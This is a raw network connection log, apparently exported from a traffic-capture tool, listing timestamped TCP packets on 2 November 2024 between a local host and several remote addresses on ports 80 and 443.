                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.007605076 CET63896443192.168.2.4188.114.96.3
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.007622957 CET44363896188.114.96.3192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.545084000 CET4436390013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.545938015 CET63900443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.545973063 CET4436390013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.546380997 CET63900443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.546395063 CET4436390013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.557776928 CET4436389713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.557840109 CET4436389713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.557893038 CET63897443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.558315039 CET63897443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.558331013 CET4436389713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.558341980 CET63897443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.558346987 CET4436389713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.562401056 CET4436390213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.566891909 CET63902443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.566910982 CET4436390213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.567301989 CET63902443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.567327976 CET4436390213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.577388048 CET63903443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.577434063 CET4436390313.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.577507973 CET63903443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.577754974 CET63903443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.577775002 CET4436390313.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.578166962 CET4436390113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.579247952 CET63901443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.579260111 CET4436390113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.579623938 CET63901443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.579628944 CET4436390113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.582782030 CET4436389913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.585948944 CET63899443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.585961103 CET4436389913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.586334944 CET63899443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.586338043 CET4436389913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.673871040 CET4436390013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.673914909 CET4436390013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.673958063 CET63900443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.674088955 CET63900443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.674120903 CET4436390013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.677469969 CET63904443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.677498102 CET4436390413.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.677602053 CET63904443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.677728891 CET63904443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.677742958 CET4436390413.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.694120884 CET4436390213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.694212914 CET4436390213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.694267035 CET63902443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.694463968 CET63902443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.694463968 CET63902443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.694485903 CET4436390213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.694506884 CET4436390213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.702157974 CET63905443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.702183962 CET4436390513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.702255011 CET63905443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.702956915 CET63905443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.702969074 CET4436390513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.712001085 CET4436390113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.712054014 CET4436390113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.712105036 CET63901443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.712214947 CET63901443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.712214947 CET63901443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.712256908 CET4436390113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.712285042 CET4436390113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.714184046 CET63906443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.714200974 CET4436390613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.714298010 CET63906443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.714899063 CET63906443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.714910030 CET4436390613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.730312109 CET4436389913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.730340004 CET4436389913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.730371952 CET4436389913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.730468035 CET63899443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.732748032 CET63899443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.732752085 CET4436389913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.732825041 CET63899443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.732829094 CET4436389913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.750989914 CET63907443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.750998974 CET4436390713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.751043081 CET63907443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.756506920 CET63907443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.756516933 CET4436390713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.760615110 CET8063898185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.760656118 CET8063898185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.760665894 CET8063898185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.760725975 CET6389880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.760726929 CET8063898185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.760725975 CET6389880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.760725975 CET6389880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.760740042 CET8063898185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.760757923 CET8063898185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.760770082 CET8063898185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.760780096 CET6389880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.760782957 CET8063898185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.760796070 CET8063898185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.760812044 CET6389880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.760838985 CET6389880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.760842085 CET8063898185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.760910034 CET6389880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.765804052 CET8063898185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.765849113 CET6389880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.765858889 CET8063898185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.765877962 CET8063898185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.765887022 CET8063898185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.765899897 CET6389880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.765918970 CET6389880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.765929937 CET6389880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.923093081 CET8063898185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.923106909 CET8063898185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.923118114 CET8063898185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.923141956 CET6389880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.923168898 CET6389880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.923341036 CET8063898185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.923353910 CET8063898185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.923365116 CET8063898185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.923377037 CET8063898185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.923388958 CET8063898185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.923389912 CET6389880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.923398972 CET6389880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.923432112 CET6389880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.923945904 CET8063898185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.923994064 CET6389880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.924168110 CET8063898185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.924180031 CET8063898185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.924196005 CET8063898185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.924209118 CET8063898185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.924213886 CET6389880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.924225092 CET6389880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.924246073 CET6389880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.924258947 CET6389880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.924518108 CET8063898185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.924540997 CET8063898185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.924560070 CET8063898185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.924571037 CET8063898185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.924575090 CET6389880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.924582005 CET8063898185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.924598932 CET6389880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.924634933 CET6389880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.925193071 CET8063898185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.925235033 CET6389880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.925235987 CET8063898185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.925251007 CET8063898185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.925281048 CET6389880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.925292015 CET6389880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.925293922 CET8063898185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.925307989 CET8063898185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.925318956 CET8063898185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.925338984 CET6389880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.925367117 CET6389880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.928060055 CET8063898185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.928100109 CET6389880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.928183079 CET8063898185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:27.928225040 CET6389880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:28.085597038 CET8063898185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:28.085614920 CET8063898185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:28.085622072 CET8063898185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:28.085627079 CET8063898185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:28.085633039 CET8063898185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:28.085637093 CET8063898185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:28.085688114 CET8063898185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:28.085726023 CET8063898185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:28.085730076 CET8063898185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:28.085850000 CET6389880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:28.085875034 CET8063898185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:28.085886955 CET8063898185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:28.085896969 CET8063898185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:28.085907936 CET8063898185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:28.085921049 CET8063898185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:28.085923910 CET6389880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:28.085943937 CET6389880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:28.085954905 CET8063898185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:28.085964918 CET6389880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:28.085967064 CET8063898185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:28.085979939 CET8063898185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:28.085999966 CET6389880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:28.086021900 CET6389880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:28.086422920 CET8063898185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:28.086462975 CET8063898185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:28.086473942 CET8063898185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:28.086482048 CET6389880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:28.086502075 CET6389880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:28.086512089 CET8063898185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:28.086524010 CET8063898185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:28.086535931 CET8063898185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:28.086546898 CET8063898185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:28.086560011 CET6389880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:28.086564064 CET8063898185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:28.086576939 CET8063898185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:28.086585999 CET6389880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:28.086590052 CET8063898185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:28.086601019 CET6389880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:28.086605072 CET8063898185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:28.086616039 CET6389880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:28.086641073 CET6389880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:28.086654902 CET6389880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:28.087191105 CET8063898185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:28.087210894 CET8063898185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:28.087222099 CET8063898185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:28.087275982 CET6389880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:28.087280989 CET8063898185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:28.087291956 CET8063898185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:28.087302923 CET8063898185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:28.087327003 CET8063898185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:28.087328911 CET6389880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:28.087367058 CET8063898185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:28.087378979 CET8063898185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:28.087389946 CET8063898185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:28.087392092 CET6389880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:28.087402105 CET8063898185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:28.087414980 CET8063898185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:28.087424994 CET8063898185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:28.087440968 CET6389880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:28.087507963 CET6389880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:28.242620945 CET8063898185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:28.242643118 CET8063898185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:28.242656946 CET8063898185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:28.242675066 CET8063898185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:28.242679119 CET6389880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:28.242687941 CET8063898185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:28.242702961 CET6389880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:28.242706060 CET8063898185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:28.242718935 CET8063898185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:28.242738962 CET6389880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:28.242753029 CET6389880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:28.258579016 CET6390880192.168.2.4185.215.113.206
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:28.263500929 CET8063908185.215.113.206192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:28.263588905 CET6390880192.168.2.4185.215.113.206
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:28.263741970 CET6390880192.168.2.4185.215.113.206
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:28.268604040 CET8063908185.215.113.206192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:28.329776049 CET4436390313.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:28.330728054 CET63903443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:28.330786943 CET4436390313.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:28.331079960 CET63903443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:28.331095934 CET4436390313.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:28.365071058 CET8063898185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:28.365084887 CET8063898185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:28.365128994 CET8063898185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:28.365166903 CET8063898185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:28.365176916 CET8063898185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:28.365267992 CET8063898185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:28.365278959 CET8063898185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:28.365289927 CET8063898185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:28.365299940 CET6389880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:28.365396023 CET8063898185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:28.365417957 CET6389880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:28.365446091 CET8063898185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:28.365457058 CET8063898185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:28.365473032 CET6389880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:28.365564108 CET6389880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:28.365593910 CET8063898185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:28.365606070 CET8063898185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:28.365623951 CET8063898185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:28.365634918 CET8063898185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:28.365645885 CET8063898185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:28.365677118 CET6389880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:28.365739107 CET6389880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:28.365838051 CET8063898185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:28.365866899 CET8063898185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:28.365880013 CET8063898185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:28.365889072 CET6389880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:28.365912914 CET6389880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:28.365937948 CET8063898185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:28.365950108 CET8063898185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:28.365991116 CET6389880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:28.366143942 CET8063898185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:28.366156101 CET8063898185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:28.366168976 CET8063898185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:28.366183043 CET8063898185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:28.366187096 CET6389880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:28.366218090 CET6389880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:28.366240978 CET6389880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:28.366307020 CET8063898185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:28.366355896 CET6389880192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:28.366377115 CET8063898185.215.113.16192.168.2.4
